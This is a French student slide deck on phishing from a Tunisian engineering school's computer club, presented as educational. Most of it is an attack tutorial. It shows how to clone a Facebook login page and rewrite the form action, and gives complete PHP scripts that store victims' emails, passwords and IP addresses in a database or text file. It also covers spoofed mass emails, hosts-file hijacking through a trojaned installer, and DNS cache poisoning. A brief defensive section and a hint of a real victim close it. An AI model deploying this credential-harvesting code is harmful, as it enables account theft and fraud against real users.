phishing
DESCRIPTION
Présentation faite par Mohamed Amine RHOUMA et Marwen ZORGUI sur le phishingTRANSCRIPT
1
Le Phishing
Elaboré par:
Mohamed Amine RHOUMA
Marwen ZORGUI
11/11/2011 2010
Le Club d’Informatique et du Logiciel Libre de l’Ecole
Polytechnique de Tunisie
2
Illegal
3
LOL …
4
Disclaimer
Cette présentation est à titre éducatif, Il est strictement illégal de l’appliquer à des fins
malhonnêtes.
5
PLAN
C’est quoi le Phishing??
Préparation nécessaire
Piéger la victime
Comment se protéger??
6
PLAN
C’est quoi le Phishing??
Préparation nécessaire
Piéger la victime
Comment se protéger??
7
Définition
• Concaténation de phreaking (piratage des systèmes téléphoniques) et fishing (pêche)
• « Aller à la pèche aux informations »
• Connu aussi avec Hameçonnage et Filoutage
• Technique utilisée par les fraudeurs pour obtenir des renseignements personnels
8
Principe de l’attaque
SITE FACTICE:
La victime croît être sur un site de confiance pour saisir ses données personnelles, mais en réalité il est en train de les envoyer au pirate informatique
9
Principe
Accès à la page trompeuse
Saisie des informations confidentielles
Enregistrement des données par le criminel
10
Quelques statistiques…
• En 2007,le Phishing a rapporté 3.2 milliards de dollars aux pirates
• Sites victimes de Phishing : tous les sites contenant des données personnelles, surtout bancaires (PayPal, Facebook, SNCF, CAF, …)
• 55.000 utilisateurs d'ordinateurs victimes d'arnaques de Phishing tous les mois dans le monde
11
PLAN
C’est quoi le Phishing??
Préparation nécessaire
Piéger la victime
Comment se protéger??
12
Préparation nécessaire
Création de la page trompeuse
Stockage des données
13
Création de la page trompeuse
Enregistrement de la page originale avec les images et les autres fichiers (CSS : CascadingStyle Sheets, JavaScript…)
14
Création de la page trompeuse
• Modifier le code source de la page trompeuse et plus précisément l’attribut ACTION de la balise <FORM>
• Firebug : module complémentaire pour Firefox
15
Edition avec Firebug
16
Création de la page trompeuse
<formmethod ="POST" action="https://login.facebook.com/login.php?login_attempt=1"><input name="email" value="Adresse électronique" type="text"><input name="pass" type="password"></form>
Devient:
<form method="POST" action=“phishing.php" ><input name="email" value="Adresse électronique" type="text"><input name="pass" type="password"></form>
17
Préparation nécessaire
• On peut utiliser WAMPserver qui permet à notre machine de se comporter comme un serveur
• Une autre alternative est d’héberger notre page web sur la toile
18
Stockage des données
On dispose de plusieurs méthodes pour récupérer les données :
• Utilisation d’une Base de Données
• Utilisation d’un fichier.txt
• Utilisation de la fonction mailto
• Etc.
19
Base de données: création
20
Base de Données: code PHP
<?phpmysql_connect("localhost","root","");mysql_select_db("madrid");
$a=$_POST["email"];$b=$_POST["pass"];$c=$_SERVER["REMOTE_ADDR"];
$reponse=mysql_query("INSERT INTO tableau VALUES('','$a','$b','$c')") or die(mysql_error());
Header("Location: http://www.facebook.com/");
?>
21
Fichier TXT<?php
$fp = fopen("fichier.txt","a+");
fputs($fp,$_POST[email]);fputs($fp," ");fputs($fp,$_POST[pass]);fputs($fp," ");fputs($fp," ");fputs($fp,$_SERVER["REMOTE_ADDR"]);fputs($fp," ");
fclose($fp);
Header("Location:https://login.facebook.com/login.php?login_attempt=1");?>
22
PLAN
C’est quoi le Phishing??
Préparation nécessaire
Piéger la victime
Comment se protéger??
23
24
Piéger la victime
Mail piège
Fichier hosts
DNS Cache poisoning
Etc.
25
Mail piège
Simple, rapide et efficace
• Créer une adresse mail imitant un tiers de confiance(adresses jetables, faux mail…), par [email protected]
• Reproduire le logo de la société dont on usurpel’identité.
• Trouver un prétexte pour que les victimes se rendent sur le site factice, pour y entrer leurs infos personnelles.
• Envoyez le mail piégeur à autant de gens que possible.
26
Fichier hosts
• Dans le dossier :
C:\Windows\System32\drivers\etc
• Consultation de ce fichier avant l'accès au serveur DNS
• Permet au système de connaitre l'adresse IP associée au nom de domaine sans avoir recours à une requête DNS
27
Fichier hosts
• Attaque par .rar dont l’extraction remplace le fichier hosts
• Attaque par fichier .exe dont l’installation va modifier le fichier hosts (Binder)
28
Binder : principe
VLC.exe virus.exe
VLC.exe(Piégeant)
29
Fichier hosts
Linux empêche toute sorte d’attaque
30
DNS Cache Poisoning
• Les serveurs DNS possèdent un cache permettant de garder pendant un certain temps la correspondance entre un nom de machine et son adresse IP
• Le DNS Cache Poisoning consiste à corrompre ce cache avec de fausses informations
31
Bref
• Mail piége
• Fichier Hosts
• DNS Cache poisoning
• …
32
PLAN
C’est quoi le Phishing??
Préparation nécessaire
Piéger la victime
Comment se protéger??
33
Comment se protéger??
• Assurez-vous, lorsque vous saisissez des informations sensibles, que le navigateur est en mode sécurisé (https)
34
Comment se protéger??
• S’assurer que le domaine du site dans l'adresse correspond bien à celui annoncé (Attention à l'orthographe du domaine)
• Se méfier des sites web de type http://41.229.1.181/facebook
• Vérifier les liens dans les mails même s’ils proviennent d’une source de confiance
35
Comment se protéger??
• Il faut être particulièrement vigilant lorsque l'on rencontre une adresse Web contenant le symbole « @ »
Par exemple l'adresse http://[email protected]/
mène à 41.229.0.170 et non pas à www.facebook.com comme on pourrait le croire
36
Comment se protéger??
• Ne Télécharger les programmes que depuis des sites officiels
• Utiliser un antivirus
37
Surprise!!
Notre première victime a été ….
38
39
Merci pour votre attention !!
40